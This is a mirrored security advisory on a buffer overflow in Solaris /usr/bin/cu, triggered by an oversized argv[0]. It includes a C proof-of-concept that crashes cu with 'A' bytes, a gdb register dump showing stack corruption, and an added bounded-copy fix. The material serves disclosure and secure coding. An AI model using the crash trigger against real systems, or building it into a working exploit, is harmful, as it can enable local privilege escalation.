[ SOURCE: http://www.secureroot.com/security/advisories/9798441358.html ]

Description

The /usr/bin/cu command contains a buffer overflow. cu copies its own name (argv[0]) into an internal fixed-size variable without checking the length of argv[0]. Because a caller controls argv[0] freely through the exec family of calls, a sufficiently long name overflows that buffer.

Vulnerable Versions

Sun Solaris 2.4
Sun Solaris 2.5
Sun Solaris 2.5.1
Sun Solaris 2.6
Sun Solaris 2.7
(Solaris 2.8 not tested)

Technical Description

The following demo program launches /usr/bin/cu with argv[0] set to a string of N bytes of 0x41 ('A'), where N is given on the command line. The header names had been lost from the original listing; the includes below are the ones the calls need.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* cu-demo: exec /usr/bin/cu with an argv[0] of N-1 'A' bytes plus a NUL (N = argv[1]) */
int main(int argc, char **argv)
{
    char *buf;
    int len;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]);
        return 1;
    }
    len = atoi(argv[1]);
    buf = (char *) malloc(len * sizeof(char));
    memset(buf, 0x41, len - 1);     /* fill with 'A' */
    buf[len - 1] = 0;               /* NUL-terminate */
    execl("/usr/bin/cu", buf, (char *) 0);
    perror("execl");                /* only reached if the exec fails */
    return 1;
}

$ uname -a
SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5
$ ./cu-demo 4000
Segmentation Fault (core dumped)
$ gdb ./cu-demo --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.5.1"...
warning: core file may not match specified executable file.
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
#0  0xef62901c in ?? ()
(gdb) info registers
g0             0x0        0
g1             0xef628d24 -278754012
g2             0x0        0
g3             0x0        0
g4             0x0        0
g5             0x0        0
g6             0x0        0
g7             0x0        0
o0             0x137a4    79780
o1             0xef792a88 -277271928
o2             0x0        0
o3             0x0        0
o4             0x0        0
o5             0xef792a88 -277271928
sp             0xefffecb0 -268440400
o7             0x31b48    203592
l0             0x7efefeff 2130640639
l1             0x81010100 -2130640640
l2             0xff000000 -16777216
l3             0xff0000   16711680
l4             0xff00     65280
l5             0x81010100 -2130640640
l6             0x7        7
l7             0xef7927d4 -277272620
i0             0x39000    233472
i1             0xeffffec4 -268435772
i2             0x38088    229512
i3             0x41414141 1094795585
i4             0x2f       47
i5             0x0        0
fp             0xefffecf0 -268440336
i7             0x137a4    79780
y              0x0        0
psr            0x4400086  71303302
wim            0x0        0
tbr            0x0        0
pc             0xef62901c -278753252
npc            0xef628ffc -278753284
fpsr           0x0        0
cpsr           0x0        0

Note the value 0x41414141 ("AAAA") in register i3: bytes of the oversized argv[0] have been written over saved state on the stack, which is what the copy into the internal variable corrupted before the fault at 0xef62901c.

Pablo Sor
psor@afip.gov.ar
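The following is an added example, not code from the advisory or from Solaris: it places the unbounded argv[0] copy that the advisory describes beside a bounded replacement, and measures how far a strcpy() of a cu-demo-style name of 0x41 bytes would run past a fixed buffer. The buffer size PROGNAME_MAX is an assumption for illustration; the advisory does not state the size of cu's internal variable, and the 'A'-filled names are constructed in the program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the internal name buffer (the advisory gives no real size). */
#define PROGNAME_MAX 64

/* The vulnerable pattern the advisory describes: argv[0] copied into a
 * fixed buffer with no length check. Writes strlen(argv0)+1 bytes whatever
 * the destination size is; shown only for contrast, do not call it with an
 * attacker-controlled argv[0]. */
void set_progname_unsafe(char *dst, const char *argv0)
{
    strcpy(dst, argv0);
}

/* Bytes that set_progname_unsafe() would write past the end of a
 * bufsize-byte buffer; 0 means the name (with its NUL) fits. */
size_t argv0_overflow_bytes(const char *argv0, size_t bufsize)
{
    size_t need = strlen(argv0) + 1;
    return need > bufsize ? need - bufsize : 0;
}

/* Hardened replacement: bounded copy that always NUL-terminates.
 * Returns 0 if the name fit, 1 if it was truncated, -1 on a zero-size buffer. */
int set_progname_safe(char *dst, size_t dstsize, const char *argv0)
{
    size_t n = strlen(argv0);
    if (dstsize == 0)
        return -1;
    if (n >= dstsize) {
        memcpy(dst, argv0, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return 1;
    }
    memcpy(dst, argv0, n + 1);
    return 0;
}

/* Build an argv[0] of namelen 0x41 ('A') bytes, as cu-demo does, copy it with
 * the bounded routine into a PROGNAME_MAX buffer, and return the length of
 * the stored name (capped at PROGNAME_MAX-1 by truncation). */
size_t copy_constructed_name(size_t namelen)
{
    char name_buf[PROGNAME_MAX];
    char *argv0 = malloc(namelen + 1);
    size_t stored;

    if (argv0 == NULL)
        return 0;
    memset(argv0, 0x41, namelen);
    argv0[namelen] = '\0';
    set_progname_safe(name_buf, sizeof name_buf, argv0);
    stored = strlen(name_buf);
    free(argv0);
    return stored;
}

int main(int argc, char **argv)
{
    /* Default to the 4000-byte name from the advisory's session. */
    size_t namelen = argc > 1 ? (size_t) strtoul(argv[1], NULL, 10) : 4000;
    char name_buf[PROGNAME_MAX];
    char *argv0 = malloc(namelen + 1);

    if (argv0 == NULL)
        return 1;
    memset(argv0, 0x41, namelen);
    argv0[namelen] = '\0';

    printf("argv[0] of %zu bytes: strcpy() would overrun a %d-byte buffer by %zu bytes\n",
           namelen, PROGNAME_MAX, argv0_overflow_bytes(argv0, PROGNAME_MAX));
    if (set_progname_safe(name_buf, sizeof name_buf, argv0) == 1)
        printf("bounded copy truncated the name to %zu bytes\n", strlen(name_buf));
    else
        printf("name fit without truncation\n");
    free(argv0);
    return 0;
}
```

The bounded routine reports truncation instead of silently dropping bytes, so a program that prints its own name in usage or error messages can still detect and log an absurdly long argv[0] rather than overwriting its stack as cu does.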